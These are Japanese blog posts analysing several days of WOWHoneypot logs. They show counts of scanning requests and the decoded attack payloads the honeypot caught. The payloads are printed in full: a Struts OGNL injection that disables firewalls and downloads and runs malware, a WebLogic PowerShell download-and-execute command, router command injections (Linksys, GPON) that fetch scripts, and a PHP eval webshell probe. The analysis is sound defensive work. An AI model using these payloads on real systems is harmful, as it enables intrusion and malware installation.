2018-06-12

WOWHoneypot簡易分析(8日目)

honeypot

WOWhoneypotの2018/6/11(月)（運用8日目）の簡易分析です。

総アクセスは197件でした。

awk '/06-11/{print $1,$5,$6}' /var/log/wowhoneypot/access_log | sort | uniq -c | sort -nr

81 [2018-06-11 "GET /
16 [2018-06-11 "GET /index.action
2 [2018-06-11 "POST /HNAP1/
2 [2018-06-11 "POST /getcfg.php
2 [2018-06-11 "GET /xampp/phpmyadmin/index.php
2 [2018-06-11 "GET /www/phpMyAdmin/index.php
2 [2018-06-11 "GET /web/phpMyAdmin/index.php
2 [2018-06-11 "GET /typo3/phpmyadmin/index.php
2 [2018-06-11 "GET /tools/phpMyAdmin/index.php
2 [2018-06-11 "GET /pmd/index.php
2 [2018-06-11 "GET /pma-old/index.php
2 [2018-06-11 "GET /pmamy/index.php
2 [2018-06-11 "GET /pmamy2/index.php
2 [2018-06-11 "GET /PMA/index.php
2 [2018-06-11 "GET /pma/index.php
2 [2018-06-11 "GET /PMA2/index.php
2 [2018-06-11 "GET /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-11 "GET /phpmyadmin/phpmyadmin/index.php
2 [2018-06-11 "GET /phpMyAdminold/index.php
2 [2018-06-11 "GET /phpMyAdmin.old/index.php
2 [2018-06-11 "GET /phpmyadmin-old/index.php
2 [2018-06-11 "GET /phpMyAdmin/index.php
2 [2018-06-11 "GET /phpmyadmin/index.php
2 [2018-06-11 "GET /phpMyadmin_bak/index.php
2 [2018-06-11 "GET /phpmyadmin2/index.php
2 [2018-06-11 "GET /phpmyadmin1/index.php
2 [2018-06-11 "GET /phpmyadmin0/index.php
2 [2018-06-11 "GET /phpma/index.php
2 [2018-06-11 "GET /phpadmin/index.php
2 [2018-06-11 "GET /mysqladmin/index.php
2 [2018-06-11 "GET /mysql-admin/index.php
2 [2018-06-11 "GET /myadmin/index.php
2 [2018-06-11 "GET /myadmin2/index.php
2 [2018-06-11 "GET /index.php
2 [2018-06-11 "GET /db/index.php
2 [2018-06-11 "GET /dbadmin/index.php
2 [2018-06-11 "GET /claroline/phpMyAdmin/index.php
2 [2018-06-11 "GET /authentication.cgi?captcha=&dummy=0000000000000
2 [2018-06-11 "GET /admin/PMA/index.php
2 [2018-06-11 "GET /admin/pma/index.php
2 [2018-06-11 "GET /admin/phpMyAdmin/index.php
2 [2018-06-11 "GET /admin/phpmyadmin/index.php
2 [2018-06-11 "GET /admin/phpmyadmin2/index.php
2 [2018-06-11 "GET /admin/mysql/index.php
2 [2018-06-11 "GET /admin/mysql2/index.php
2 [2018-06-11 "GET /admin/index.php
1 [2018-06-11 "PROPFIND /
1 [2018-06-11 "POST //xx.php
1 [2018-06-11 "POST //wuwu11.php
1 [2018-06-11 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-11 "POST //s.php
1 [2018-06-11 "POST //sheep.php
1 [2018-06-11 "POST /hndUnblock.cgi
1 [2018-06-11 "GET /webfig/roteros.info
1 [2018-06-11 "GET /moo
1 [2018-06-11 "GET http://114.215.207[.]183:83/index.php
1 [2018-06-11 "GET http://112.124.127[.]162:83/index.php
1 [2018-06-11 "GET /hndUnblock.cgi

ハンティングログは以下です。

$ awk '{print $1,substr($0,index($0,$4))}' hunting.log
[2018-06-11 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh
[2018-06-11 wget -c hxxp://119.188.247[.]73:5858/TTTUS2
[2018-06-11 wget -c hxxp://wap.tfddos[.]net:57843/linux
[2018-06-11 wget -c hxxp://119.188.247[.]73:5858/TTTUS2
[2018-06-11 wget -c hxxp://wap.tfddos[.]net:57843/linux
[2018-06-11 wget -c hxxp://119.188.247[.]73:5858/TTTUS2
[2018-06-11 wget -c hxxp://wap.tfddos[.]net:57843/linux
[2018-06-11 wget -c hxxp://119.188.247[.]73:5858/TTTUS2
[2018-06-11 wget -c hxxp://wap.tfddos[.]net:57843/linux

こちらのログでこれまでと変化があるのは119.188.247[.]73:5858から取得するものたtatadaからTTTUS2に変化したことのみです。
https://www.hybrid-analysis.com/sample/9f70a41600d4425f0a6ec2e71134072badcb6d00e09e27bf877e34b27d814619/5b1e9afc7ca3e15a3d11e0b7

アクセスログの中からindex.phpのアクセスを除いてみます。

81 [2018-06-11 "GET /
16 [2018-06-11 "GET /index.action
2 [2018-06-11 "POST /HNAP1/
2 [2018-06-11 "POST /getcfg.php
2 [2018-06-11 "GET /authentication.cgi?captcha=&dummy=0000000000000
1 [2018-06-11 "PROPFIND /
1 [2018-06-11 "POST //xx.php
1 [2018-06-11 "POST //wuwu11.php
1 [2018-06-11 "POST /wls-wsat/CoordinatorPortType
1 [2018-06-11 "POST //s.php
1 [2018-06-11 "POST //sheep.php
1 [2018-06-11 "POST /hndUnblock.cgi
1 [2018-06-11 "GET /webfig/roteros.info
1 [2018-06-11 "GET /moo
1 [2018-06-11 "GET /hndUnblock.cgi

index.actionへのアクセスはstrutsの脆弱性を狙ったものです。

GET /index.action HTTP/1.1
Connection: Keep-Alive
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c hxxp://119.188.247[.]73:5858/TTTUS2;chmod 777 TTTUS2;./TTTUS2;').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
Referer: hxxp://(WOW-ipadress):80/index.action
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

ハンティングログで拾っていたものですね。iptables等を停止させてからwgetでマルウェアをダウンロード、権限付与して実行と強い悪意を感じます。

Weblogicの脆弱性はいつもと変わらずです。

$ awk '/06-11/{print $1,$5,$6,$10}' access_log | grep wls | awk '{print $4}' | base64 -d | grep -o 'Hidden.*' | awk '{print $3}' | base64 -d

<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E $OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://120.25.148[.]202/images/test/DL.php');</string>
※Hiddenの後ろの文字はbase64 エンコードされていましたのでデコードしています。

その他。以下の2つはcookieに入れてる値が同じです。
getcfg.phpはD-Link DIR-645のRCEの脆弱性を突く攻撃のようです。

awk '/06-11/{print $1,$5,$6,$10}' access_log | grep getcfg | awk '{print $4}' | base64 -d
POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

$ awk '/06-11/{print $1,$5,$6,$10}' access_log | grep auth | awk '{print $4}' | base64 -d
GET /authentication.cgi?captcha=&dummy=0000000000000 HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
User-Agent: Wget(linux)

以下の4つのパスに対する攻撃の手法は同じでした。

POST //xx.php HTTP/1.1
POST //wuwu11.php HTTP/1.1
POST //s.php HTTP/1.1
POST //sheep.php HTTP/1.1

Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: zh-cn
Referer: http://(WOW-IP)//xx.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Length: 345
axa=@ eval (base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOztwcmludCgiaGFvcmVuZ2UuY29tUVEzMTcyNzU3MzgiKTs7ZWNobygifDwtIik7ZGllKCk7

以下はLinksysのルータのRCEの脆弱性を突くための攻撃のようです。

$ awk '/06-11/{print $1,$5,$6,$10}' /var/log/wowhoneypot/access_log | grep hndUnblock | awk '{print $4}' | base64 -d

POST /hndUnblock.cgi HTTP/1.1
Accept: */*
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh`&StartEPI=1
※``の間は%エンコードされていました。

以上です。

*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class

2018-06-11

WOWHoneypotの簡易分析(7日目)

honeypot

2018/06/10のログの解析です。

本日の総アクセス数は290件でした。徐々にアクセス数は伸びているような気がします。

awk '{print $1,$5,$6}' access_log | grep "06-10" | sort | uniq -c | sort -nr

48 [2018-06-10 "GET /
6 [2018-06-10 "GET /pmd/index.php
6 [2018-06-10 "GET /pmamy2/index.php
6 [2018-06-10 "GET /PMA2/index.php
6 [2018-06-10 "GET /phpmyadmin/index.php
6 [2018-06-10 "GET /phpMyadmin_bak/index.php
6 [2018-06-10 "GET /phpmyadmin2/index.php
6 [2018-06-10 "GET /phpmyadmin1/index.php
6 [2018-06-10 "GET /phpmyadmin0/index.php
6 [2018-06-10 "GET /mysql-admin/index.php
6 [2018-06-10 "GET /index.php
6 [2018-06-10 "GET /claroline/phpMyAdmin/index.php
6 [2018-06-10 "GET /admin/index.php
5 [2018-06-10 "GET /xampp/phpmyadmin/index.php
5 [2018-06-10 "GET /tools/phpMyAdmin/index.php
5 [2018-06-10 "GET /phpMyAdmin.old/index.php
5 [2018-06-10 "GET /phpmyadmin-old/index.php
5 [2018-06-10 "GET /myadmin2/index.php
5 [2018-06-10 "GET /admin/PMA/index.php
5 [2018-06-10 "GET /admin/phpMyAdmin/index.php
5 [2018-06-10 "GET /admin/phpmyadmin2/index.php
5 [2018-06-10 "GET /admin/mysql/index.php
4 [2018-06-10 "GET /www/phpMyAdmin/index.php
4 [2018-06-10 "GET /web/phpMyAdmin/index.php
4 [2018-06-10 "GET /pma-old/index.php
4 [2018-06-10 "GET /pmamy/index.php
4 [2018-06-10 "GET /phpmyadmin/phpmyadmin/index.php
4 [2018-06-10 "GET /phpMyAdminold/index.php
4 [2018-06-10 "GET /phpMyAdmin/index.php
4 [2018-06-10 "GET /mysqladmin/index.php
4 [2018-06-10 "GET /myadmin/index.php
4 [2018-06-10 "GET /db/index.php
4 [2018-06-10 "GET /dbadmin/index.php
4 [2018-06-10 "GET /admin/pma/index.php
4 [2018-06-10 "GET /admin/phpmyadmin/index.php
4 [2018-06-10 "GET /admin/mysql2/index.php
3 [2018-06-10 "PROPFIND /
3 [2018-06-10 "POST /wls-wsat/CoordinatorPortType
3 [2018-06-10 "GET /PMA/index.php
3 [2018-06-10 "GET /pma/index.php
3 [2018-06-10 "GET /phpMyAdmin/phpMyAdmin/index.php
3 [2018-06-10 "GET /phpma/index.php
3 [2018-06-10 "GET /phpadmin/index.php
3 [2018-06-10 "GET /mysql/index.php
2 [2018-06-10 "GET /typo3/phpmyadmin/index.php
2 [2018-06-10 "GET /sitemap.xml
2 [2018-06-10 "GET /robots.txt
2 [2018-06-10 "GET /favicon.ico
1 [2018-06-10 "HEAD /robots.txt
1 [2018-06-10 "HEAD /
1 [2018-06-10 "GET /x
1 [2018-06-10 "GET /.well-known/security.txt
1 [2018-06-10 "GET /PMA/
1 [2018-06-10 "GET /pma/
1 [2018-06-10 "GET /phpMyAdmin-2.6.0-beta2/
1 [2018-06-10 "GET /phpMyAdmin-2.6.0-beta1/
1 [2018-06-10 "GET /phpMyAdmin-2.6.0-alpha2/
1 [2018-06-10 "GET /phpMyAdmin-2.6.0-alpha/
1 [2018-06-10 "GET /phpMyAdmin-2.5.7-pl1/
1 [2018-06-10 "GET /phpMyAdmin-2.5.7/
1 [2018-06-10 "GET /phpMyAdmin-2.5.6-rc2/
1 [2018-06-10 "GET /phpMyAdmin-2.5.6-rc1/
1 [2018-06-10 "GET /phpMyAdmin-2.5.6/
1 [2018-06-10 "GET /phpMyAdmin-2.5.5-rc2/
1 [2018-06-10 "GET /phpMyAdmin-2.5.5-rc1/
1 [2018-06-10 "GET /phpMyAdmin-2.5.5-pl1/
1 [2018-06-10 "GET /phpMyAdmin-2.5.5/
1 [2018-06-10 "GET /phpMyAdmin-2.5.4/
1 [2018-06-10 "GET /phpMyAdmin-2.5.1/
1 [2018-06-10 "GET /phpMyAdmin-2.2.6/
1 [2018-06-10 "GET /phpMyAdmin-2.2.3/
1 [2018-06-10 "GET /phpMyAdmin2/
1 [2018-06-10 "GET /phpMyAdmin-2/
1 [2018-06-10 "GET /phpmyadmin2/
1 [2018-06-10 "GET /phpMyAdmin/
1 [2018-06-10 "GET /phpmyadmin/
1 [2018-06-10 "GET /php-my-admin/
1 [2018-06-10 "GET /openserver/phpmyadmin/
1 [2018-06-10 "GET /mysql/
1 [2018-06-10 "GET /myadmin/
1 [2018-06-10 "GET /manager/html
1 [2018-06-10 "GET http://www.msftncsi[.]com/ncsi.txt
1 [2018-06-10 "GET /HNAP1/
1 [2018-06-10 "GET /dbadmin/
1 [2018-06-10 "GET /admin/

またも大量のPhpMyAdmin関係です。
それっぽいのは抜いて見ましょう。

48 [2018-06-10 "GET /
3 [2018-06-10 "PROPFIND /
3 [2018-06-10 "POST /wls-wsat/CoordinatorPortType
2 [2018-06-10 "GET /sitemap.xml
2 [2018-06-10 "GET /robots.txt
2 [2018-06-10 "GET /favicon.ico
1 [2018-06-10 "HEAD /robots.txt
1 [2018-06-10 "HEAD /
1 [2018-06-10 "GET /x
1 [2018-06-10 "GET /.well-known/security.txt
1 [2018-06-10 "GET /manager/html
1 [2018-06-10 "GET http://www.msftncsi[.]com/ncsi.txt
1 [2018-06-10 "GET /HNAP1/

いつものWeblogicの脆弱性が本日は3件です。

それ以外にはサイトの構成調査と思われるのが11件。

それ以外で気になるのは、以下のログです。

1 [2018-06-10 "GET /x
1 [2018-06-10 "GET /.well-known/security.txt
1 [2018-06-10 "GET /manager/html
1 [2018-06-10 "GET http://www.msftncsi[.]com/ncsi.txt
1 [2018-06-10 "GET /HNAP1/

それぞれ見ていきましょう。

1 [2018-06-10 "GET /x
User-Agent: Telesphoreo

UAから判断するに、iOSの脱獄に関するアプリのようです。

1 [2018-06-10 "GET /.well-known/security.txt

→SSL証明書を発行するときの一時ファイルがあるかの調査行為と思われます。

1 [2018-06-10 "GET /manager/html

→Tomcatの管理ツールがあるかの調査行為と思われます。

1 [2018-06-10 "GET /HNAP1/

→D-Link 社のルータにおける SOAPAction に対するコマンド実行の試み(CVE-2015-2051)があるかの調査行為と思われます。

1 [2018-06-10 "GET http://www.msftncsi[.]com/ncsi.txt

→プロキシを探す調査行為と思われます。

なお、本日のハンティングログはありませんでした。

2018-06-10

WOWHoneypotの簡易分析(6日目)

honeypot

WOWhoneypotの2018/6/9(土)（運用6日目）の簡易分析です。

総アクセス数は168件でした。

うちこれまでにも来ていたものは、以下です。

トップページへのアクセス：42件
PhpMyAdminに関する調査行為：121件
Welogicの脆弱性(CVE-2017-10271)を狙った攻撃：2件

Weblogicのものは、取得先URｌがそれぞれ異なり、以下でした。

120.25.148[.]202/test/DL.php
101.200.45[.]78/test/DL.php

新たに見たものを以下、見ていきます。

GET hxxp://db.speedup[.]gdn/echo.php
User-Agent: PxBroker/0.3.1/3923

特徴的なUser-Agentのため、そこで調査したところ以下のGithubが見つかりました。

https://github.com/constverum/ProxyBroke

どうやら、公開プロキシを探すオープンソースのツールのようです。これによるスキャン行為かと思われます。

パスに入る部分に書かれていたURLを調査しましたが、恐らくは見つかった場合にログとして残すためのコールバック先と思われます。

https://www.hybrid-analysis.com/sample/285b8c5726429d23b7c3344036243e1dbbf02a8c608baf731978c220d51f9a05/5b12667c7ca3e1074b33f394

次。以前にも見かけたものです。

GET hxxp://clientapi.iip[.]net/echo.php

こちらは特徴的なものは特に見つけられませんでした。通信先はHAで調べてみました。

https://www.hybrid-analysis.com/sample/f96b093c0c48d285937425e5b7b9f4ab6ff114f7a82dbfb905ba8e35d6800627?environmentId=100

確証はありませんが、ひとつ前のものと同じかもしれません。

次。これは特徴がわかりやすいものでした。

GET /GponFrom/diag_Form?images/
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wet -q0 hxxp://128.199.251[.]119/gpon.php?port=80`

家庭用GPONルータの任意のコード実行の脆弱性を狙ったものと思われます。

家庭用 GPON ルータの脆弱性を狙う「Mirai」の亜種、メキシコ発のネットワークスキャン活動で確認 | トレンドマイクロセキュリティブログ

blog.n-etupirka.net

こちらのハニーポッターの方と同様のログを確認しています。

取得しにいくファイルですが、これも他と同様アクセスログを取得しているだけと推測しています。アクセスログがあった場合には、個別で攻撃を行うものと思われます。

https://www.hybrid-analysis.com/sample/e1407cf357ae5dfe26c61a3cffeaefbe08dbee36fe2afb52dbcf55fa4635413f/5b1caa807ca3e11bcc55caf3

ハンティングログに残っていたものは、GPONのもののみでした。

前日まで来ていたものは来ていなかったです。

S-Owl

S(ecurity)Owl

WOWHoneypot簡易分析(8日目)

WOWHoneypotの簡易分析(7日目)

WOWHoneypotの簡易分析(6日目)